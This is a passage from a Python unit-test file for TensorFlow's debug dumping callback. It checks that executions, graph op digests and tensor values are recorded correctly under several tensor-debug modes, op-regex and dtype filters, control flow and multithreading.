("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
outermost_graphs = reader.outermost_graphs()
self.assertLen(outermost_graphs, 1)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, so doesn't get logged to the
# .execution file.
executions = reader.executions()
self.assertLen(executions, 1)
self.assertIn("sin1p_log_sum", executions[0].op_type)
# Get the executed graph and verify its identity and inner graph.
graph = reader.graph_by_id(executions[0].graph_id)
self.assertEqual(graph.name, "sin1p_log_sum")
self.assertLen(graph.inner_graph_ids, 1)
inner_graph = reader.graph_by_id(graph.inner_graph_ids[0])
self.assertEqual(inner_graph.name, "log_sum")
# Check device names.
self.assertLen(executions[0].output_tensor_device_ids, 1)
self.assertEqual(
reader.device_name_by_id(executions[0].output_tensor_device_ids[0]),
self._expectedDefaultDeviceName())
self.assertIn(self._expectedDefaultDeviceName(),
set(reader.device_name_map().values()))
# Verify the recorded graph-building history.
placeholder_op_digests = reader.graph_op_digests(op_type="Placeholder")
add_op_digests = reader.graph_op_digests(op_type="AddV2")
self.assertLen(add_op_digests, 2)
self.assertEqual(
reader.graph_by_id(add_op_digests[0].graph_id).name, "log_sum")
self.assertEqual(
reader.graph_by_id(add_op_digests[1].graph_id).name, "sin1p_log_sum")
log_op_digests = reader.graph_op_digests(op_type="Log")
self.assertLen(log_op_digests, 1)
self.assertEqual(
reader.graph_by_id(log_op_digests[0].graph_id).name, "log_sum")
sin_op_digests = reader.graph_op_digests(op_type="Sin")
self.assertLen(sin_op_digests, 1)
self.assertEqual(
reader.graph_by_id(sin_op_digests[0].graph_id).name, "sin1p_log_sum")
# Verify the output tensor IDs and the stack traces.
for op_digest in add_op_digests + log_op_digests + sin_op_digests:
# These are all single-output ops.
self.assertLen(op_digest.output_tensor_ids, 1)
self.assertGreaterEqual(op_digest.output_tensor_ids[0], 0)
_, stack_frames = reader.read_graph_op_creation_stack_trace(op_digest)
self._verifyStackFrames(stack_frames)
graph_exec_traces = [trace for trace in reader.graph_execution_traces()
if trace.op_type != "Const"]
executed_op_types = [digest.op_type for digest in graph_exec_traces]
self.assertEqual(
executed_op_types,
["Placeholder", "Placeholder", "Placeholder", "Placeholder",
"AddV2", "Log", "AddV2", "Sin"])
placeholder_traces = graph_exec_traces[:4]
non_placeholder_traces = graph_exec_traces[4:]
# Verify the graph ID stack of each op.
# The outer function's 1st Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[0].graph_ids[-1]).name,
"sin1p_log_sum")
# The outer function's 2nd Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[1].graph_ids[-1]).name,
"sin1p_log_sum")
# The inner function's 1st Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[2].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(placeholder_traces[2].graph_ids[-2]).name,
"sin1p_log_sum")
# The inner function's 2nd Placeholder.
self.assertEqual(
reader.graph_by_id(placeholder_traces[3].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(placeholder_traces[3].graph_ids[-2]).name,
"sin1p_log_sum")
# 1st AddV2 op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[0].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[0].graph_ids[-2]).name,
"sin1p_log_sum")
# Log op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[1].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[1].graph_ids[-2]).name,
"sin1p_log_sum")
# 2nd AddV2 op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[2].graph_ids[-1]).name,
"sin1p_log_sum")
# Sin op.
self.assertEqual(
reader.graph_by_id(non_placeholder_traces[3].graph_ids[-1]).name,
"sin1p_log_sum")
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for trace in graph_exec_traces:
self.assertIsNone(trace.debug_tensor_value)
elif tensor_debug_mode == "CURT_HEALTH":
# Test the association between graph exec and prior graph building.
# In each case, the 1st element of debug_tensor_value is the ID of the
# symbolic tensor and the 2nd element is a zero indicating there is no
# inf or nan.
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0], 0.0])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0], 0.0])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0], 0.0])
self.assertAllClose( # 2nd inner placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0], 0.0])
self.assertAllClose( # 1st AddV2 op.
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 0.0])
self.assertAllClose( # Log op.
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 0.0])
self.assertAllClose( # 2nd AddV2 op.
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 0.0])
self.assertAllClose( # Sin op.
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 0.0])
elif tensor_debug_mode == "CONCISE_HEALTH":
# 1st element: tensor_id.
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0], 1., 0., 0., 0.])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0], 1., 0., 0., 0.])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0], 1., 0., 0., 0.])
self.assertAllClose( # 2nd inner placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0], 1., 0., 0., 0.])
# 1st AddV2 op.
self.assertAllClose(
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# Log op.
self.assertAllClose(
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# 2nd AddV2 op.
self.assertAllClose(
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# Sin op.
self.assertAllClose(
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
elif tensor_debug_mode == "FULL_HEALTH":
# Elements: [
# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
self.assertAllClose( # 2nd inner placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# 1st AddV2 op.
self.assertAllClose(
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# Log op.
self.assertAllClose(
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# 2nd AddV2 op.
self.assertAllClose(
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# Sin op.
self.assertAllClose(
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
elif tensor_debug_mode == "SHAPE":
# 1st element: tensor_id.
# 2nd element: dtype (float32).
# 3rd element: rank (scalar).
# 4th element: element count (1).
# Remaining elements: shape padded to fixed length (6).
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
self.assertAllClose( # 2nd inner placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
# 1st AddV2 op.
self.assertAllClose(
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# Log op.
self.assertAllClose(
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# 2nd AddV2 op.
self.assertAllClose(
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# Sin op.
self.assertAllClose(
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
else: # FULL_TENSOR.
placeholder_full_tensor_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in placeholder_traces]
self.assertAllClose(placeholder_full_tensor_values[0], x) # Input x.
self.assertAllClose(placeholder_full_tensor_values[1], y) # Input y.
self.assertAllClose(placeholder_full_tensor_values[2], x) # Input x.
self.assertAllClose(placeholder_full_tensor_values[3], y) # Input y.
non_placeholder_full_tensor_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in non_placeholder_traces]
self.assertAllClose(
non_placeholder_full_tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(
non_placeholder_full_tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(
non_placeholder_full_tensor_values[2],
np.log(5.0) + 1.0) # 2nd AddV2 op.
self.assertAllClose(
non_placeholder_full_tensor_values[3],
np.sin(np.log(5.0) + 1.0)) # Sin op.
def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
"""Test correct executed IDs of two FuncGraphs from the same Py function."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def ceil_times_two(x):
return math_ops.ceil(x) * 2.0
x_float32 = np.array(3.5, dtype=np.float32)
x_float64 = np.array(4.5, dtype=np.float64)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 4)
for execution in executions:
self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
executed_graph_ids = [execution.graph_id for execution in executions]
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
for executed_graph_id in executed_graph_ids:
self.assertEqual(
reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
"""Two FuncGraphs compiled from Python functions with identical names."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
class TestClass(object):
@def_function.function
def ceil_times_two(self, x):
return math_ops.ceil(x) * 2.0
# The `ceil_times_two` method of the two objects will be compiled
# into separate FuncGraphs.
test_object_1 = TestClass()
test_object_2 = TestClass()
x = np.array(3.5, dtype=np.float32)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 4)
for execution in executions:
self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
executed_graph_ids = [execution.graph_id for execution in executions]
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
for executed_graph_id in executed_graph_ids:
self.assertEqual(
reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
@parameterized.named_parameters(
("AddV2", "AddV2"),
("Log", "Log"),
("AddV2AndLog", "(AddV2|Log)"),
)
@test_util.run_in_graph_and_eager_modes
def testOpRegex(self, op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
op_regex=op_regex)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(
self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_op_digests = reader.graph_op_digests()
op_types = [digest.op_type for digest in graph_op_digests]
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests]
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
if op_regex == "AddV2":
self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(
tensor_values[1], np.log(5.0) + 1.0) # 2nd AddV2 op.
elif op_regex == "Log":
self.assertEqual(executed_op_types, ["Log"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], np.log(5.0)) # Log op.
else: # "(AddV2|Log)"
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(
tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
def testIncorrectTensorDTypeArgFormatLeadsToError(self):
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes=dict())
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes="float32")
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_dtypes=dtypes.float32)
with self.assertRaises(TypeError):
dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
@parameterized.named_parameters(
("float", [dtypes.float32], None),
("float_only_sum", ["float32"], "Sum"),
("float_no_sum", (dtypes.float32,), "(?!Sum)"),
("int", [dtypes.int32], None),
("int_via_lambda", lambda dtype: dtype.is_integer, None),
("exclude_Sum", None, "(?!Sum)"),
("All", None, None),
)
@test_util.run_in_graph_and_eager_modes
def testTensorDTypesAndOpRegexFilters(self,
tensor_dtypes,
op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
tensor_dtypes=tensor_dtypes,
op_regex=op_regex)
@def_function.function
def unique_sum(xs):
"""Sum over the unique values, for testing."""
unique_xs, indices = array_ops.unique(xs)
return math_ops.reduce_sum(unique_xs), indices
xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
y, indices = self.evaluate(unique_sum(xs))
self.assertAllClose(y, 17.)
self.assertAllEqual(indices, [0, 1, 2, 3, 0])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests
if digest.op_type not in ("Const", "Placeholder")]
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests
if digest.op_type not in ("Const", "Placeholder")]
if tensor_dtypes == [dtypes.float32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique", "Sum"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllClose(tensor_values[1], 17.) # Sum.
elif tensor_dtypes == ["float32"] and op_regex == "Sum":
self.assertEqual(executed_op_types, ["Sum"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], 17.) # Sum.
elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
elif tensor_dtypes == [dtypes.int32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(
tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif callable(tensor_dtypes) and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(
tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif not tensor_dtypes and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique", "Unique"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllEqual(
tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
else: # "All".
self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllEqual(
tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
self.assertAllClose(tensor_values[2], 17) # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_op_digests = reader.graph_op_digests()
op_types = [digest.op_type for digest in graph_op_digests]
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should be both empty.
self.assertEqual(reader.num_executions(), 0)
self.assertEqual(reader.num_graph_execution_traces(), 0)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
reader.update()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
executions = reader.executions()
self.assertLen(executions, 1)
executed_op_types = [execution.op_type for execution in executions]
self.assertIn("iterative_doubling", executions[0].op_type)
execution = executions[0]
self.assertLen(execution.input_tensor_ids, 2)
self.assertLen(execution.output_tensor_ids, 1)
self.assertEqual(
debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
tensor_debug_mode)
if tensor_debug_mode == "FULL_TENSOR":
tensor_values = reader.execution_to_tensor_values(execution)
self.assertAllClose(tensor_values, [8.0])
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces
if trace.op_type != "Const"]
if tensor_debug_mode != "CURT_HEALTH":
# Less outputs a boolean tensor, which is not tracked under CURT_HEALTH.
# The Less op should have been executed 5 times.
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# AddV2 produces an int tensor, which is not tracked under CURT_HEALTH.
# The AddV2 op should have been run, but we refrain from asserting on
# how many times it's executed.
self.assertIn("AddV2", executed_op_types)
for trace in graph_exec_traces:
self.assertEqual(trace.output_slot, 0)
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor_id; 2nd element: 0 indicating no inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0.0])
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Less"]
self.assertAllEqual(less_values, [True, True, True, True, False])
mul_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Mul"]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 2)
for execution in executions:
self.assertGreater(execution.wall_time, 0)
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
_, stack_frames = reader.read_execution_stack_trace(execution)
self._verifyStackFrames(stack_frames)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
new_dump_root = self.dump_root + "_new_dump_root"
writer = dumping_callback.enable_dump_debug_info(new_dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(new_dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 2)
for execution in executions:
self.assertGreater(execution.wall_time, 0)
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
_, stack_frames = reader.read_execution_stack_trace(execution)
self._verifyStackFrames(stack_frames)
with debug_events_reader.DebugDataReader(
self.dump_root) as old_dump_root_reader:
old_dump_root_reader.update()
# The old dump root shouldn't have been written to.
self.assertEqual(old_dump_root_reader.num_executions(), 0)
self.assertFalse(old_dump_root_reader.outermost_graphs())
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
"""Assert calling enable_dump_debug_info() with two tensor-debug modes.
It should lead to overwriting of the previously-configured mode.
"""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def add_1_divide_by_2(x):
return (x + 1.0) / 2.0
self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_digests = reader.graph_execution_traces(digest=True)
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
for tensor_value in tensor_values:
# Under NO_TENSOR mode, each tensor is summarized as an empty float32
# array.
self.assertAllEqual(tensor_value, [])
with self.assertRaisesRegexp(
ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
dumping_callback.disable_dump_debug_info()
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
self.assertEqual(reader.num_executions(), 0)
self.assertEqual(reader.num_graph_execution_traces(), 0)
self.assertFalse(reader.outermost_graphs())
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("FullHealth", "FULL_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
"""Dumping from multiple threads using the same setting."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = variables.Variable(10.0, dtype=dtypes.float32)
y = variables.Variable(3.0, dtype=dtypes.float32)
@def_function.function
def increase_x():
return x.assign_add(y * 2.0)
increase_x()
num_threads = 3
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=increase_x))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 10 --> 16 --> 22 --> 28 --> 34.
self.assertAllClose(x.read_value(), 34.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
prev_wall_time = 1
for exec_digest in exec_digests:
self.assertGreaterEqual(exec_digest.wall_time, prev_wall_time)
prev_wall_time = exec_digest.wall_time
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
self.assertEqual(
executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
for trace in graph_exec_traces:
# These are all single-output tensors.
self.assertEqual(trace.output_slot, 0)
tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor ID; 2nd element: 0 indicating no inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
elif tensor_debug_mode == "CONCISE_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor ID.
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1, 0, 0, 0])
elif tensor_debug_mode == "FULL_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# Elements: [
